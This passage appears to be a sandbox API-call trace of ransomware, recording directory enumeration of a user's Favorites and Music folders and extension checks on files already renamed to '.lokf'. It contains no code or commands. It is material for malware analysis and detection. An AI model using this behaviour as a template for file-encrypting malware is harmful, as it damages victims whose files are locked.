ftLastAccessTime.dwLowDateTime=0x20c4cc90, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x20c4cc90, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0148.263] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x20c009d0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x1d3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="IE Add-on site.url.lokf", cAlternateFileName="IEADD-~1.LOK")) returned 1 [0148.263] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE Add-on site.url.lokf") returned=".lokf" [0148.263] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x20c009d0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x1d3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="IE site on Microsoft.com.url.lokf", cAlternateFileName="IESITE~1.LOK")) returned 1 [0148.263] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE site on Microsoft.com.url.lokf") returned=".lokf" [0148.263] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x20c26b30, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x1d3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft At Home.url.lokf", cAlternateFileName="MICROS~1.LOK")) returned 1 [0148.263] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft At Home.url.lokf") returned=".lokf" [0148.263] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x20c26b30, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x1d3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft At Work.url.lokf", cAlternateFileName="MICROS~2.LOK")) returned 1 [0148.264] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft At Work.url.lokf") returned=".lokf" [0148.264] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x20c4cc90, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x1d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft Store.url.lokf", cAlternateFileName="MICROS~3.LOK")) returned 1 [0148.264] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft Store.url.lokf") returned=".lokf" [0148.264] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x20c4cc90, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x1d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft Store.url.lokf", cAlternateFileName="MICROS~3.LOK")) returned 0 [0148.264] FindClose (in: hFindFile=0x3220d58 | out: hFindFile=0x3220d58) returned 1 [0148.264] PeekMessageW (in: lpMsg=0x391ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391ff08) returned 0 [0148.264] PeekMessageW (in: lpMsg=0x391fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391fb74) returned 0 [0148.265] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\") returned="MSN Websites\\" [0148.265] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\") returned="Favorites\\" [0148.265] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0148.265] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0148.265] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0148.265] PathFindFileNameW (pszPath="") returned="" [0148.265] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\*", lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x20ce5210, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x20ce5210, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3220d58 [0148.266] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x20ce5210, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x20ce5210, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0148.266] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x20c72df0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x1d3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSN Autos.url.lokf", cAlternateFileName="MSNAUT~1.LOK")) returned 1 [0148.266] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Autos.url.lokf") returned=".lokf" [0148.266] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x20c72df0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x1d3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSN Entertainment.url.lokf", cAlternateFileName="MSNENT~1.LOK")) returned 1 [0148.266] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Entertainment.url.lokf") returned=".lokf" [0148.266] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x20c98f50, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x1d3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSN Money.url.lokf", cAlternateFileName="MSNMON~1.LOK")) returned 1 [0148.266] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Money.url.lokf") returned=".lokf" [0148.266] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x20cbf0b0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x1d3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSN Sports.url.lokf", cAlternateFileName="MSNSPO~1.LOK")) returned 1 [0148.266] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Sports.url.lokf") returned=".lokf" [0148.266] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x20cbf0b0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x1d3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSN.url.lokf", cAlternateFileName="MSNURL~1.LOK")) returned 1 [0148.266] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN.url.lokf") returned=".lokf" [0148.266] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x20ce5210, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x1d3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSNBC News.url.lokf", cAlternateFileName="MSNBCN~1.LOK")) returned 1 [0148.266] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSNBC News.url.lokf") returned=".lokf" [0148.266] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x20ce5210, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x1d3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSNBC News.url.lokf", cAlternateFileName="MSNBCN~1.LOK")) returned 0 [0148.266] FindClose (in: hFindFile=0x3220d58 | out: hFindFile=0x3220d58) returned 1 [0148.267] PeekMessageW (in: lpMsg=0x391ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391ff08) returned 0 [0148.267] PeekMessageW (in: lpMsg=0x391fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391fb74) returned 0 [0148.267] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\") returned="Windows Live\\" [0148.267] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\") returned="Favorites\\" [0148.267] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0148.267] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0148.267] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0148.267] PathFindFileNameW (pszPath="") returned="" [0148.267] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\*", lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x20d57630, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x20d57630, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3220d58 [0148.268] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x20d57630, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x20d57630, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0148.268] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x20d0b370, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x1d3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Get Windows Live.url.lokf", cAlternateFileName="GETWIN~1.LOK")) returned 1 [0148.268] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Get Windows Live.url.lokf") returned=".lokf" [0148.268] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x20d314d0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x1d3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Windows Live Gallery.url.lokf", cAlternateFileName="WINDOW~1.LOK")) returned 1 [0148.268] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Gallery.url.lokf") returned=".lokf" [0148.268] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x20d314d0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x1d3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Windows Live Mail.url.lokf", cAlternateFileName="WINDOW~2.LOK")) returned 1 [0148.268] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Mail.url.lokf") returned=".lokf" [0148.268] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x20d57630, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x1d3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Windows Live Spaces.url.lokf", cAlternateFileName="WINDOW~3.LOK")) returned 1 [0148.268] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Spaces.url.lokf") returned=".lokf" [0148.268] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x20d57630, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x1d3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Windows Live Spaces.url.lokf", cAlternateFileName="WINDOW~3.LOK")) returned 0 [0148.268] FindClose (in: hFindFile=0x3220d58 | out: hFindFile=0x3220d58) returned 1 [0148.269] PeekMessageW (in: lpMsg=0x391ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391ff08) returned 0 [0148.269] PeekMessageW (in: lpMsg=0x391fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391fb74) returned 0 [0148.269] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\eIv9rDB\\") returned="eIv9rDB\\" [0148.269] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\") returned="Music\\" [0148.269] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0148.269] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0148.269] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0148.269] PathFindFileNameW (pszPath="") returned="" [0148.269] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\eIv9rDB\\*", lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6f5fb960, ftCreationTime.dwHighDateTime=0x1d4d2cd, ftLastAccessTime.dwLowDateTime=0x20defbb0, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x20defbb0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3220d58 [0148.270] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6f5fb960, ftCreationTime.dwHighDateTime=0x1d4d2cd, ftLastAccessTime.dwLowDateTime=0x20defbb0, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x20defbb0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0148.270] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x75906a80, ftCreationTime.dwHighDateTime=0x1d4d3bf, ftLastAccessTime.dwLowDateTime=0x21396ff0, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x21396ff0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="-Y1PqBS8_MAyXOFE", cAlternateFileName="-Y1PQB~1")) returned 1 [0148.270] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x478db0f0, ftCreationTime.dwHighDateTime=0x1d4c7a0, ftLastAccessTime.dwLowDateTime=0xd9308810, ftLastAccessTime.dwHighDateTime=0x1d4ce7c, ftLastWriteTime.dwLowDateTime=0x20d7d790, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0xca22, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="2RGMtQTERV.mp3.lokf", cAlternateFileName="2RGMTQ~1.LOK")) returned 1 [0148.270] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\eIv9rDB\\2RGMtQTERV.mp3.lokf") returned=".lokf" [0148.270] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xddd40d10, ftCreationTime.dwHighDateTime=0x1d4cd4b, ftLastAccessTime.dwLowDateTime=0xf8f6ed60, ftLastAccessTime.dwHighDateTime=0x1d4c9db, ftLastWriteTime.dwLowDateTime=0x20da38f0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x13b3b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="JzgoC0SQ.m4a.lokf", cAlternateFileName="JZGOC0~1.LOK")) returned 1 [0148.270] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\eIv9rDB\\JzgoC0SQ.m4a.lokf") returned=".lokf" [0148.270] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6a15c810, ftCreationTime.dwHighDateTime=0x1d4d286, ftLastAccessTime.dwLowDateTime=0x1538d8b0, ftLastAccessTime.dwHighDateTime=0x1d4c821, ftLastWriteTime.dwLowDateTime=0x20dc9a50, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x12ceb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="nKN_va3f4.mp3.lokf", cAlternateFileName="NKN_VA~1.LOK")) returned 1 [0148.271] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\eIv9rDB\\nKN_va3f4.mp3.lokf") returned=".lokf" [0148.271] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x542f48e0, ftCreationTime.dwHighDateTime=0x1d4d179, ftLastAccessTime.dwLowDateTime=0x4fbf03f0, ftLastAccessTime.dwHighDateTime=0x1d4c859, ftLastWriteTime.dwLowDateTime=0x20dc9a50, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x7325, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ohsb8tUwwTI.mp3.lokf", cAlternateFileName="OHSB8T~1.LOK")) returned 1 [0148.271] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\eIv9rDB\\ohsb8tUwwTI.mp3.lokf") returned=".lokf" [0148.271] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x39b2e350, ftCreationTime.dwHighDateTime=0x1d4d54d, ftLastAccessTime.dwLowDateTime=0x6115bc80, ftLastAccessTime.dwHighDateTime=0x1d4c61e, ftLastWriteTime.dwLowDateTime=0x20defbb0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x172b3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="w_gaxxrjB.wav.lokf", cAlternateFileName="W_GAXX~1.LOK")) returned 1 [0148.271] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\eIv9rDB\\w_gaxxrjB.wav.lokf") returned=".lokf" [0148.271] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x11e175e0, ftCreationTime.dwHighDateTime=0x1d4cfac, ftLastAccessTime.dwLowDateTime=0x3b5e9560, ftLastAccessTime.dwHighDateTime=0x1d4d47a, ftLastWriteTime.dwLowDateTime=0x20defbb0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0xe0cf, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_o S4wHhVVehFDOD.m4a.lokf", cAlternateFileName="_OS4WH~1.LOK")) returned 1 [0148.271] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\eIv9rDB\\_o S4wHhVVehFDOD.m4a.lokf") returned=".lokf" [0148.271] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x11e175e0, ftCreationTime.dwHighDateTime=0x1d4cfac, ftLastAccessTime.dwLowDateTime=0x3b5e9560, ftLastAccessTime.dwHighDateTime=0x1d4d47a, ftLastWriteTime.dwLowDateTime=0x20defbb0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0xe0cf, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_o S4wHhVVehFDOD.m4a.lokf", cAlternateFileName="_OS4WH~1.LOK")) returned 0 [0148.271] FindClose (in: hFindFile=0x3220d58 | out: hFindFile=0x3220d58) returned 1 [0148.272] PeekMessageW (in: lpMsg=0x391ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391ff08) returned 0 [0148.272] PeekMessageW (in: lpMsg=0x391fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391fb74) returned 0 [0148.272] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\m4--j\\") returned="m4--j\\" [0148.272] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\") returned="Music\\" [0148.272] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0148.272] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0148.272] 